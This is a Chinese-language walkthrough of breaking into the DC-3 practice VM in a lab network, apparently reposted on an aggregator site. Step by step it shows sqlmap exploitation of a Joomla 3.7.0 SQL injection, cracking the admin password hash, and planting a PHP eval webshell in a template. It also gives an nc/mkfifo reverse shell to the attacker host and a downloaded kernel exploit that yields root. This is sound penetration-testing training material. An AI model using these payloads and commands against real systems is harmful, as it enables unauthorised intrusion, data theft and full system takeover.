当前位置: 首页 > news >正文

DC-3靶机渗透测试

先对内网进行探活扫描

nmap -sn 192.168.207.0/24

dc-3的ip是192.168.207.131,进行端口扫描

nmap -sV -p- 192.168.207.131

开放了http服务,上浏览器访问http://192.168.207.131查看一下网站内容

有一个登录框,没有验证码,可以尝试弱口令,使用的是Joomla框架

进行目录扫描

dirsearch -u http://192.168.207.131

扫到一个管理员登录页面

我们对框架进行版本扫描

joomscan是针对joomla的扫描器

joomscan --url http://192.168.207.131

Joomla 3.7.0

searchsploit Joomla 3.7.0

存在sql注入

searchsploit -m 42033.txt
cat 42033.txt

这里让我们用sqlmap并给出相应语句

sqlmap -u "http://192.168.207.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

查joomladb中的表

sqlmap -u "http://192.168.207.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D joomladb --tables

查#__users表里的字段

sqlmap -u "http://192.168.207.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D joomladb -T "#__users" --columns

这里的#__users要用双引号框起来,不然会报错

第一个填y,第二个填y,第三个随便填,第四个填10

获取字段username和password

sqlmap -u "http://192.168.207.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D joomladb -T "#__users" -C username,password –dump

得到admin和密码哈希

将哈希存入txt中让john去跑一下

echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' >666.txt
john 666.txt

得到密码snoopy,登录网页后台

选择Extensions>Templates>Templates

选择Beez3 Details and Files

选择new file

点击左边的html,选择php创建文件

上传一句话木马

<?php @eval($_POST['Z']);?>

上传保存

访问上传的路径http://192.168.207.131/templates/beez3/html/

使用蚁剑远程连接终端

接下来反弹shell到kali里

在kali里输入

nc -lvvp 6666

开启监听

在蚁剑里输入

nc 192.168.207.128 6666 -e /bin/bash

页面显示-e不可用

那么使用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.207.128 6666 >/tmp/f

是利用 nc + FIFO 管道实现的反弹Shell写法,常用于没有 nc -e 参数时

rm /tmp/f:删除 /tmp/f,因为后面要创建一个新的 FIFO 文件(把旧的数据删掉)

mkfifo /tmp/f:创建命名管道

cat /tmp/f:不断读取 /tmp/f 里面的数据

| /bin/sh:交给 shell 执行

-i:交互模式,让 shell 像正常终端一样工作

2>&1:把错误输出也发送出去

python -c 'import pty;pty.spawn("/bin/bash")'

查看系统版本

cat /etc/os-release

是Ubuntu 16.04

searchsploit Ubuntu 16.04

选择Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' b | linux/local/39772.txt

searchsploit -m linux/local/39772.txt
cat 39772.txt

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

开启http服务上传39772.zip

python3 -m http.server 80

到dc-3的终端上

​wget http://192.168.207.128/39772.zip

unzip 39772.zip
cd 39772

tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit

./compile.sh
./doubleput

whoami

成功获得root权限

cd ~
ls
cat the-flag.txt

渗透测试成功

http://www.jsqmd.com/news/1286053/

相关文章:

  • 低压工况下阀门密封性能的影响因素与试验评价方法
  • 剑桥Phrasebank:非母语科研人的学术写作神器,从词穷到文通
  • TextFSM与Python网络自动化:从CLI回显到结构化数据的解析实战
  • 布隆过滤器(Bloom Filter)
  • 高性能RPC框架brpc:从核心原理到生产级配置与调优实战
  • LTE Cat 1模块与PIC32在工业物联网中的设计与优化
  • C++异常处理实战:从RAII到内存池的健壮程序构建
  • 深度优先与广度优先搜索的性能差异对比7
  • 2026新疆污水处理设备口碑推荐,价格透明零套路不踩坑 - 工业品牌热点
  • 一键式绿色排产工具:制造业智能调度与节能优化方案
  • AI会议系统三重防护:提升企业级应用可靠性
  • Java中使用阿里巴巴开源库TransmittableThreadLocal:跨线程上下文传递讲解
  • 工业物联网通信:LTE Cat 1模组与MCU的稳定连接方案
  • FastAPI + Celery 实战:用任务队列处理耗时操作
  • STP协议深度解析:从原理到实战,网络工程师必备的二层防环指南
  • C++ std::unique算法详解:高效移除相邻重复元素
  • 大语言模型内存共享架构INMS解析与应用实践
  • 从MATLAB滤波器设计到Simulink仿真的工程化实践指南
  • 高端外墙砖厂家怎么选?国达陶瓷入选优选推荐分析,高端外墙砖/通体大理石瓷砖/小区楼盘建筑外墙砖,高端外墙砖品牌找哪家 - 品牌推荐师
  • 2026年适合小型设备用的阻垢剂生产厂家有哪些?口碑好的源头厂家推荐 - 工业品牌热点
  • 薄荷:穿越千年的清凉之味
  • UnrealEngine日志打印出现中文乱码解决方法
  • 2026年济南刚性防水套管批发厂家甄选指南:如何优选可靠供应商? - geo交流
  • 别一不舒服就上网狂搜:你的身体,只是在给你发日志
  • C# WinForm DataGridView数据绑定与CRUD操作实战教程
  • STM32 FMC/FSMC外部存储器配置详解与HAL库实战避坑指南
  • 物联网设备电池寿命优化:NBM7100A与dsPIC33EP方案
  • Cadence Allegro 17.4 Snap Pick To功能详解:从原理到高效布线实战
  • 2026年场景化盘点:付金龙运营全屏通智能眼镜靠谱吗?这份严选指南给你答案 - geo交流
  • 2026 年 7 月新发布:甘孜优秀的穿孔吸音硅酸钙板加工厂选型指南,你家影院声学效果差?居然不是靠音箱,是这玩意儿在发力? - 行业严选官